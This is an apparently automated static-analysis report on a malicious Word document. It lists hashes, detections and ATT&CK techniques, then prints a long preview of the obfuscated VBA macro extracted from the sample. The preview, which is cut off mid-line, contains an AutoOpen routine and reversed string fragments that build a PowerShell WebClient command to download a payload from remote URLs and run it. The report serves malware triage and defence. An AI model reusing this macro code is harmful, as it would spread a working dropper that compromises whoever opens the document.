Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e9725d1ae08361b7…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 154.0 KB
Created: 2018-05-16 17:11:00
Authoring application: Microsoft Office Word
First seen: 2018-06-30
MD5: a7fe0cd404940a966176b2f80f9faefa
SHA-1: ce7563acc93c026c77c2d4c66a6c101276cce6a6
SHA-256: e9725d1ae08361b7393e7e78d635650c8e73c069e2df729b0b10a8f9e5583729
Risk Score: 202

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample is a Word document containing a VBA macro with an AutoOpen subroutine. The macro calls the Shell() function, a critical indicator of malicious intent that suggests it is designed to download and execute a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-6546450-0' further supports classifying the sample as a dropper.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6546353-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6546353-0
  • VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 129659 bytes
SHA-256: a0bf70c286ac8da0fd296ab4516ab6f5179a64e98895b16b307ca7175d168d89

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "MjtwMfazQA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub dFnKn(kcZTz)
PztzO = ImTmM
TRnqS = dfOSKz + CDbl(82980 - PSXABz - JiPRF + CDbl(40334)) - 91429 - CDbl(60760)
jrtbrW = uKwpS
znuGQ = 89482
End Sub
Sub PTkMuK(YYNHiA)
lSGPGs = cqEKz
lbXwE = pPNGj + CDbl(64211 - nuVwoH - XMVnr + CDbl(18004)) - 3264 - CDbl(79893)
dfCvIz = BOChKU
LaiaF = 11321
tQDhi = FkHvz
ckbim = qzUil + CDbl(49963 - CoJMJ - wjijPz + CDbl(27404)) - 58702 - CDbl(46946)
QHHhJr = kwvCPI
KidZbk = 91994
wMCQz = LiXtR
Dbisz = AZQNj + CDbl(63792 - sZkWoC - vtIvit + CDbl(88383)) - 74911 - CDbl(46950)
YJzCj = AlbQkW
ljVpF = 52847
End Sub
Sub IiqiKK(jNEQN)
zoWjY = pklNl
ZmXOJ = oLzIp + CDbl(37682 - rYQRX - AWVHw + CDbl(19330)) - 73332 - CDbl(32587)
lqXVEa = YvUEBc
DqzCQ = 63454
ZTNqlj = ibEXm
ZHkTPs = AVwTV + CDbl(44808 - RRwHV - MMWKiS + CDbl(88771)) - 64396 - CDbl(87996)
PjOlc = FjnXaj
XtVOM = 74608
End Sub
Sub Autoopen()
On Error Resume Next
izBCi = kaozw
GAjmH = sVLQTw + CDbl(17331 - IzRJDh - jpSfLH + CDbl(28972)) - 21855 - CDbl(60901)
qZCdDq = NdURC
dCtBE = 72084
zbFMQii (ftQda + DSBvnYXniSDYD + OHvdc)
fZdZG = FJKvaN
dbpcSG = ZWLwI + CDbl(47092 - sbzSz - IWozdn + CDbl(2639)) - 99412 - CDbl(54231)
jSCAwj = idWSj
NjQiw = 25248
End Sub
Sub LdbWUH(pzfFKz)
cdFXG = CVpcY
NbSNE = mumFr + CDbl(62673 - pwjfzR - mklCK + CDbl(20404)) - 80426 - CDbl(8655)
qnwzwt = WlaAX
lWmZr = 34038
SqrKQ = dqPDuO
PwSsij = lNtXRk + CDbl(67474 - OQlTYs - zwnhK + CDbl(30131)) - 40966 - CDbl(12887)
jlpnpE = qIVaFw
tfDfb = 98721
bqpCw = FBYjP
Lrfuv = KXuLC + CDbl(33705 - DcuBH - tHQEuA + CDbl(71128)) - 85520 - CDbl(66991)
pjpLwl = OlHVRc
QoYut = 86488
End Sub
Sub zRvWz(mkuKQb)
FbMGJR = fQzOb
toGcqz = dqRuoz + CDbl(81913 - dqzEqs - ocRlb + CDbl(85809)) - 59500 - CDbl(65745)
juTBz = SURlFP
SRKbK = 4244
End Sub

Attribute VB_Name = "CJlmbAdKEXz"
Sub IANufo(zYcmFn)
iKAbA = cHOWJh
zAHPuo = HJEWi + CDbl(73833 - CCaWj - YWTJcW + CDbl(29479)) - 41781 - CDbl(373)
qlzOuw = MsRjv
FdwOP = 49570
End Sub
Function DSBvnYXniSDYD()
On Error Resume Next
ozciC = jznXYl
YNlhY = ElNiP + CDbl(36609 - BOjjIA - uzqIPL + CDbl(37778)) - 34676 - CDbl(35830)
Usuow = sPpqVU
VNPZZS = 33858
hnZIY = WwkKW
dEdPD = PwhnmT + CDbl(6116 - CDOrZ - uhTmt + CDbl(14422)) - 6841 - CDbl(90486)
UjsDYb = uoVZj
suBFE = 24898
ZVEzYij = ZHhJP("%Ll0,k0)'x'+]31[dIlLEhS$+]1[DiLLeHs$ ( &|)93]rAhCnz", 74930 + 3 - 74930, 74930 + 42 - 74930)
TjtkM = vlqWw
UYNDtQ = kpIaVA + CDbl(51481 - oZlnCq - GkqHrL + CDbl(60301)) - 54007 - CDbl(6950)
ZtOpi = HpZcZK
XklfG = 22186
Wruqaq = fsboWw
btCzh = wUqPw + CDbl(53493 - anVnV - Dukmi + CDbl(53174)) - 8642 - CDbl(40417)
uFIkbB = tQIYBk
Aiswi = 37913
PXODrqvnmz = ZHhJP("4zziVVadjQ+djQrtnicalleidj'+'Q+djQzarg/'+'/djQ+djQ:ptth xGdjQ+djQS =djQ+djQ djQ+djQXdjQ+djQCDAUIG;'+'djQ+djQ)3djQ+djQ312'+'82 ,0000djQ+djQ'+'1(txendjQ+djQ.djQ+djQdsadaVS", 10227 + 3 - 10227, 10227 + 161 - 10227)
WnSDuT = GYYdlI
lHNAK = uFiwRS + CDbl(86013 - HldaBv - Rphjh + CDbl(70599)) - 73970 - CDbl(84084)
vQccPX = zTVzRI
lcbHz = 74662
fICQY = DuzKS
qYYavc = jkGNN + CDbl(33873 - VuKLP - WOjYN + CDbl(61089)) - 61830 - CDbl(13251)
Qwazdt = kdNsZI
YuozAm = 16190
XJDwXMQEPaL = ZHhJP("2PjetsydjQ+djQS )xGStcdjQ+djQejdjQ+djQbo-djQ+djQxGS+djQ+djQxd'+'jQ+djQGSwxGS+xGSenxGS(. =djQ+djQ U'+'YYUIG;modnar )djQ+djQxdjQ+djQGdjQ+djQStxGS+xGScdjQ+djQejbo-wxGdjQ+djQS+djQ+djQxdjQ+djQ3uKn", 90077 + 5 - 90077, 90077 + 184 - 90077)
ouGYcp = NPvtp
ImQoi = KhzXl + CDbl(27432 - KdYjfU - hKfqFR + CDbl(12078)) - 68647 - CDbl(30515)
wjSTQI = LWMzC
XVJBiX = 78045
abTBtz = OtcLG
WrKnAa = rZoDvo + CDbl(25653 - IvFDQ - TIimUG + CDbl(8706)) - 12647 - CDbl(26476)
mzGZz = ClTKr
nQFEm = 22635
GoTzuDwBL = ZHhJP("kQbQth@/B1hadjQ+djQ/mocdjQ+djQ.shcbid'+'jQ+djQ//:'+'ptdjQ+djQthdjQ+djQ@/q7MLI/ta.g-h//:pdjQ+djQtth@/djQ+djQ6djQ+djQ9djQ+djQqpdjQ+djQdd
... (truncated)